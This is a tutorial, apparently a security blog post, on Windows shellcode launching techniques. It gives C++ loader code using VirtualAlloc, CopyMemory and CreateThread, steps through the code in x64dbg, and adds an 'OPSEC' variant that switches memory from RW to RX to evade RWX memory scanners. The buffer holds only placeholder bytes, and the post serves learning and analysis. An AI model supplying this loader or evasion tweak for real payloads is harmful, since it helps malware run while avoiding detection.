Windows shellcode launching techniques

This article is an attempt to collect and present shellcode launching techniques on Windows systems along with proof of concept code and a little bit of debugging to assist the understanding on how these techniques work in the background. Wherever possible, will decorate the analysis with some references from real life, that is incidents/intrusions in which these techniques have been observed.

This post is divided in the following sections:

Technique 1: Allocate Memory via VirtualAlloc
The code
Debugging the code
The OPSEC code
Tools

Technique 1: Allocate Memory via VirtualAlloc

Assuming we have a shellcode that implements a desired fucntionality, we place this shellcode in a buffer. This buffer lies in a non-executable region in memory. This meas that if we want to execute the shellcode we’ll have to allocate a new region in memory with EXECUTE attribute. For a list of the available attributes regarding memory protection check the documentation provided by Microsoft [1]. Once we allocate this buffer, we create a thread that will exexcute the shellcode that exists in this buffer. To make sure that the shellcode gets executed, we have to wait for the thread to execute before we exit.

What is described above, can be summarized in the following Windows API chain: VirtualAlloc -> CopyMemory -> CreateThread -> WaitForSingleObject

The code

In this article the following code is the vehicle in demonstrating what happens under the hood - in memory. Scroll to the next section of this article, where magic is shown.

BYTE ShellcodeExecute()
{
	// shellcode buffer initially contains breakpoints
	// can be replaced with the actual shellcode
	const CHAR shellbuffer[] = { 0xcc, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42 };

	// allocate executable region in memory
	LPVOID allocated = NULL;
	allocated = ::VirtualAlloc(NULL, sizeof(shellbuffer), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (!allocated)
	{
		::wprintf(L"[-] VirtualAlloc has failed: %d\n", ::GetLastError());
		return 0;
	}

	// copy the shellbuffer into the allocate memory region
	CopyMemory(allocated, shellbuffer, sizeof(shellbuffer));

	// create a thread that executes the code located in shellbuffer
	SECURITY_ATTRIBUTES lpThreadAttributes = { 0 };
	HANDLE hThread = NULL;
	hThread = ::CreateThread(&lpThreadAttributes, 0, (LPTHREAD_START_ROUTINE)allocated, NULL, 0, 0);
	if (!hThread)
	{
		::wprintf(L"[-] CreateThread has failed: %d\n", GetLastError());
		return 0;
	}

	// wait until the created thread is executed
	::WaitForSingleObject(hThread, INFINITE);

	return 1;
}

INT main(INT argc, CHAR** argv)
{
	DWORD status = 0;
	status = ShellcodeExecute();
	if (!status)
	{
		::wprintf(L"[-] ShellcodeExecute has failed: %d", ::GetLastError());
		return 0;
	}

	return 1;
}

Debugging the code

It is recommended the code listed above is compiled with Debug Information. This will make things a little bit easier in locating the main function. Without the debug information the process of locating becomes challenging. After we compile the code we use x64dbg to step through see what really happens in memory.

As soon as we open the executable image with x64dbg, we are landed in the entry point. The entry for this console application is the mainCRTStartup function:

From this point onwards, we step through the code (F7 key on x64dbg) until we reach the point where our buffer is initialized in memory. As we have enabled the debug information, we can just hit the key combination Ctrl+G and type main. This brings us into the main:

Our goal is to reach the code of the ShellcodeExecute function. Looking at the code listed above, we observe that although in the source code of the main function we only make a single call to a function, there is one more call in the assembly. Since the function that executes the shellcode doesn’t accept any argument (void), we step into the second call and we land in a that jump to ShellcodeExecute:

We step into and we eventually land within the code of ShellcodeExecute. We see the instructions that put the bytes into the stack (and actually how the compiler translates the const CHAR shellbuffer[] = {…} code into assembly) and later a call to VirtualAlloc:

One question that I asked myself is in which section of the PE file these instructions exists. More specifically, where the compiler puts intructions like mov byte ptr ss:[rbp+8],CC in the file.

We can find the answer by right clicking on the address of the instruction that exists on the left hand-side column (00007FF64576177B) and selecting, Follow in Memory Map, as the picture suggests:

We identify that these commands exists in the .text of the executable:

Next question is where in memory these bytes (bytes from the buffer) are written to. To answer this question we have to right click on one of the instructions and Follow in Dump the Address: [RBP + <offset>]. As an example, we follow [RBP+8] to see where the first byte of the buffer is written:

And the result shows:

And the challenge goes on! One more question! Where VirtualAlloc actually allocates memory? To answer this, we put a breakpoint just after the call to VirtualAlloc and we inspect the the address RAX show. Remember that RAX is where the return value of the function is stored. This function returns the address of the allocated memory, so RAX will contain the address of this memory. Let’s follow this memory in dump:

When this memory is gonna be filled with bytes? This will happen after CopyMemory finishes. We can either trace the execution flow until we find where the copy process happens or we set up a hardware breakpoint to hit when something is written into the buffer. By doing this and letting the execution continue, we hit the breakpoint and see that the memory is now filled with bytes:

The first byte in the buffer is intentianlly \xcc, which is actually a breakpoint. If we continue with the execution, the flow now moves into the buffer where we placed the shellcode and the instruction pointer (RIP) points to the first instruction, in this case the breakpoint:

The OPSEC code

In order to raise less flags (especially from memory scanners that look for memory with RWX permissions) we break the memory allocation in two parts: first allocate a READ/WRITE memory to write the shellcode and then alter the permissions to EXECUTE/READ to execute the shellocde.

BYTE ShellcodeExecute()
{
	// shellcode buffer initially contains breakpoints
	// can be replaced with the actual shellcode
	const CHAR shellbuffer[] = { 0xcc, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42 };

	// allocate executable region in memory
	LPVOID allocated = NULL;
	allocated = ::VirtualAlloc(NULL, sizeof(shellbuffer), MEM_COMMIT, PAGE_READWRITE);
	if (!allocated)
	{
		::wprintf(L"[-] VirtualAlloc has failed: %d\n", ::GetLastError());
		return 0;
	}

	// copy the shellbuffer into the allocate memory region
	CopyMemory(allocated, shellbuffer, sizeof(shellbuffer));

	DWORD OldProtectt = 0;
	BOOL VirtualProtectStatus = ::VirtualProtect(allocated, sizeof(shellbuffer), PAGE_EXECUTE_READ, &OldProtectt);
	if (VirtualProtectStatus == 0)
	{
		::wprintf(L"[-] VirtualProtect has failed: %d\n", ::GetLastError());
		return 0;
	}

	// create a thread that executes the code located in shellbuffer
	SECURITY_ATTRIBUTES lpThreadAttributes = { 0 };
	HANDLE hThread = NULL;
	hThread = ::CreateThread(&lpThreadAttributes, 0, (LPTHREAD_START_ROUTINE)allocated, NULL, 0, 0);
	if (!hThread)
	{
		::wprintf(L"[-] CreateThread has failed: %d\n", GetLastError());
		return 0;
	}

	// wait until the created thread is executed
	::WaitForSingleObject(hThread, INFINITE);

	return 1;
}

Tools

The tools that were used for the purpose of this article:

Visual Studio
x64dbg

[1] https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants

tags:#Windows API